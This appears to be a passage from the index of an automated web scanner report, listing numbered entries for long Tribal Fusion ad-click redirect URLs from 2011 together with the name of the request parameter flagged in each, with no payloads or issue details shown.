3.33. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [vehicle parameter]

3.34. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

3.35. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

3.36. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

3.37. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

3.38. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

3.39. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

3.40. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

3.41. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

3.42. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

3.43. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

3.44. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

3.45. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

3.46. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

3.47. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

3.48. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

3.49. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

3.50. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

3.51. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

3.52. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3740.270604.B3/B5112048;abr parameter]

3.53. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

3.54. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [7987e parameter]

3.55. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [name of an arbitrarily supplied request parameter]

3.56. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [ord parameter]

3.57. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 3]

3.58. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 4]

3.59. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 5]

3.60. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 6]

3.61. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [REST URL parameter 7]

3.62. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [name of an arbitrarily supplied request parameter]

3.63. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [sz parameter]

3.64. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 3]

3.65. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 4]

3.66. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 5]

3.67. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 6]

3.68. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 7]

3.69. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [adID parameter]

3.70. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:a:e parameter]

3.71. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:e parameter]

3.72. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [cs:pro parameter]

3.73. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migAgencyId parameter]

3.74. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migRandom parameter]

3.75. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migSource parameter]

3.76. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migTrackDataExt parameter]

3.77. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migTrackFmtExt parameter]

3.78. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [migUnencodedDest parameter]

3.79. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [name of an arbitrarily supplied request parameter]

3.80. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [name of an arbitrarily supplied request parameter]

3.81. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/ [ord parameter]

3.82. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

3.83. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

3.84. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

3.85. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

3.86. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

3.87. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

